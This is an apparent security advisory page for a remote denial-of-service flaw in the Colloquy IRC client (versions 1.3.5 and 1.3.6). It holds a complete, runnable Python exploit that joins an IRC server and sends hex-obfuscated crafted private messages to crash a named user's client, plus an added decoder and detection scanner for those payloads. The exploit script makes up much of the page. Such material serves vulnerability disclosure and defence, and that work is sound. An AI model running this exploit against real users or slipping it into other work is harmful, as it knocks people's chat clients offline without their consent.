Release date:
Updated on:
Affected Systems:
Colloquy 1.3.6
Colloquy 1.3.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57255
Colloquy is an advanced IRC, SILC & ICB client.
A remote denial-of-service vulnerability exists in Colloquy 1.3.5 and 1.3.6. An attacker who shares an IRC network with the victim can send a crafted private message (PRIVMSG) to the victim's nickname and crash the client, causing a denial of service. The test script below sends such a message; for 1.3.6 it has to be repeated 25 times.
Source: Aph3x
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure may be harmful and is intended only for security research and teaching. Use it at your own risk.
################################################################################
#
#                               H o w - t o
#
################################################################################
#
# Provide the target: server, port, nickname, and the script will deliver
# the payload...
#
# [!] USE: $ ./<file>.py -t <server> -p <port> -n <nickname> [-s <shellcode>]
#
################################################################################
from argparse import ArgumentParser
from time import sleep
import socket

# Hex-encoded message bodies. Each decodes to a URL-like string that starts
# with "http://x/". The '1_3_5' and '1_3_6' entries are byte-identical; the
# only difference is that 1.3.6 needs the message sent 25 times.
shellcode = {
    # One Shot <3
    'one_shot': [
        "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
        "23242623262340262a232a235e28242923404040245e2340242625232323",
        "5e232526282a234026405e242623252623262e2f2e2e2e2f2e2e2e2f2324",
        "2e24"],
    # 1.3.5
    '1_3_5': [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563741532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563710932302d2d687474703a2f2f"],
    # 1.3.6 - (Requires Sending 25 Times)
    '1_3_6': [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563741532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563710932302d2d687474703a2f2f"],
}


def own(sock, target, sc_key='one_shot'):
    """Build and send 'PRIVMSG <target> :<payload>\\r\\n' (hex-assembled)."""
    sc = ''.join(shellcode[sc_key])
    targ = target.encode('ascii').hex()
    # "505249564d534720" = "PRIVMSG ", "203a" = " :", "0d0a" = "\r\n"
    msg = "505249564d534720{}203a{}0d0a".format(targ, sc)
    if sc_key != '1_3_6':
        sock.send(bytes.fromhex(msg))
    else:
        try:
            for _ in range(25):
                sock.send(bytes.fromhex(msg))
                sleep(.64)
        except OSError:
            print('failed!')


def connect(uri, port, target, sc_key):
    sock = socket.socket()
    try:
        sock.connect((uri, int(port)))
        sock.recv(8096)
    except OSError:
        print("\t[-] Failed To Connect To {}".format(uri))
        exit()
    # Register as "zem70day": "NICK zem70day\r\n" and
    # "USER zem70day HEHE HEHE :<3\r\n", hex-escaped as in the original.
    sock.send(b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x37\x30\x64\x61\x79\x0d\x0a")
    sock.send(b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x37\x30\x64\x61\x79\x20\x48\x45"
              b"\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a")
    while True:
        host_data = sock.recv(8096).decode('utf-8', 'replace').strip()
        if not host_data:
            print('\t[-] Server Closed The Connection')
            sock.close()
            exit()
        # The original script waits for this substring in the server's replies
        # before sending; adjust it to match the welcome banner of the IRCD
        # you are testing against.
        if '20140901' in host_data:
            print('\t[+] Connection Successful Sending Payload To {}'.format(target))
            own(sock, target, sc_key)
            sock.send(b'QUIT\r\n')
            sock.close()
            break
        # Answer server PINGs so the connection stays up while we wait.
        msg = host_data.split()
        if len(msg) > 1 and msg[0].lower() == 'ping':
            sock.send("PONG {}\r\n".format(msg[1]).encode('utf-8'))
    print('\t[!] Payload Sent, Target Should Drop Shortly <3')


if __name__ == '__main__':
    parser = ArgumentParser(description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target')
    parser.add_argument('-t', '--target', dest='target', default='localhost',
                        help="IRCD Server Uri To Connect On")
    parser.add_argument('-p', '--port', dest='port', default=6667,
                        help="Port To Connect On")
    parser.add_argument('-n', '--nick', dest='nick', metavar='NICK',
                        help="Nick To Target")
    parser.add_argument('-s', '--shellcode', dest='shellcode', default='one_shot',
                        choices=('one_shot', '1_3_5', '1_3_6'),
                        help='Shell Code To Use, (one_shot, 1_3_5, 1_3_6)')
    args = parser.parse_args()
    if args.nick is None:
        parser.print_help()
        exit()
    connect(args.target, args.port, args.nick, args.shellcode.strip())
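The script above hides the actual message behind hex blobs. The following is an added example, not part of the advisory or of the test script: it decodes those blobs, rebuilds the exact PRIVMSG line the script puts on the wire, and flags such messages in IRC traffic as a bouncer, proxy or IDS in front of a Colloquy client could. The hex data is copied from the script; the parser, the signature table, the nicknames and the sample traffic are constructed for this example.

```python
"""Added example (not the advisory's code): decode the test script's payloads
and detect them in IRC traffic. Sample traffic and nicknames are constructed."""
from collections import Counter

# Hex blobs copied from the test script above (what it calls "shellcode").
PAYLOAD_HEX = {
    "one_shot": [
        "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
        "23242623262340262a232a235e28242923404040245e2340242625232323",
        "5e232526282a234026405e242623252623262e2f2e2e2e2f2e2e2e2f2324",
        "2e24",
    ],
    "1_3_5": [
        "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
        "292c7573657228292c2873656c6563741532302d2d687474703a2f2f6874",
        "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
        "7573657228292c2873656c6563710932302d2d687474703a2f2f",
    ],
}
# The script's 1_3_6 entry is byte-identical to 1_3_5; only the send count differs.
PAYLOAD_HEX["1_3_6"] = PAYLOAD_HEX["1_3_5"]
PAYLOADS = {key: bytes.fromhex("".join(parts)) for key, parts in PAYLOAD_HEX.items()}

# Collapse identical byte strings into one signature name, e.g. "1_3_5/1_3_6".
SIGNATURES = {}
for key, blob in PAYLOADS.items():
    SIGNATURES[blob] = "/".join(filter(None, [SIGNATURES.get(blob), key]))


def build_privmsg(target: str, key: str) -> bytes:
    """Exactly what own() assembles from hex: 'PRIVMSG <nick> :<payload>\\r\\n'."""
    return b"PRIVMSG " + target.encode("ascii") + b" :" + PAYLOADS[key] + b"\r\n"


def parse_irc_line(raw: bytes):
    """Split an RFC 1459 line into (prefix, COMMAND, params), trailing param included.
    The payloads contain no space, so splitting on the first ' :' is safe here."""
    line = raw.rstrip(b"\r\n")
    prefix = b""
    if line.startswith(b":"):
        prefix, _, line = line[1:].partition(b" ")
    head, sep, trailing = line.partition(b" :")
    parts = [p for p in head.split(b" ") if p]
    command = parts[0].upper() if parts else b""
    params = parts[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


def classify(raw: bytes):
    """Return the signature name if this PRIVMSG carries one of the payloads, else None."""
    _, command, params = parse_irc_line(raw)
    if command != b"PRIVMSG" or len(params) < 2:
        return None
    text = params[1]
    for blob, name in SIGNATURES.items():
        if blob in text:
            return name
    return None


def scan(lines):
    """Aggregate hits per (sender nick, target, signature), so the 25-message
    repeat used against 1.3.6 shows up as one alert with a count."""
    hits = Counter()
    for raw in lines:
        name = classify(raw)
        if name is None:
            continue
        prefix, _, params = parse_irc_line(raw)
        sender = prefix.split(b"!", 1)[0].decode("ascii", "replace")
        hits[(sender, params[0].decode("ascii", "replace"), name)] += 1
    return [{"sender": s, "target": t, "signature": n, "count": c}
            for (s, t, n), c in sorted(hits.items())]


# Constructed sample traffic, as the victim's client (or a proxy in front of it)
# would receive it: the 1.3.6 flood, one one-shot message, a benign link, a PING.
SAMPLE = (
    [b":attacker!a@h PRIVMSG victim :" + PAYLOADS["1_3_6"] + b"\r\n"] * 25
    + [b":other!o@h PRIVMSG victim :" + PAYLOADS["one_shot"] + b"\r\n",
       b":friend!f@h PRIVMSG victim :http://example.com/?idx=1 is fine\r\n",
       b"PING :irc.example.net\r\n"]
)

if __name__ == "__main__":
    for key in ("one_shot", "1_3_5"):
        print(key, PAYLOADS[key].decode("latin-1").encode("unicode_escape").decode())
    for alert in scan(SAMPLE):
        print(alert)
```

Running the block prints the decoded payloads (control characters escaped) and two alerts: the 25-message flood against the 1.3.5/1.3.6 signature and the single one-shot message. Matching on the exact bytes is deliberate: the page gives no root cause for the crash, so a looser pattern would be a guess; extend the signature table only with payloads you have reproduced.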
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Colloquy
--------
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's homepage for a fixed version:
http://colloquy.info/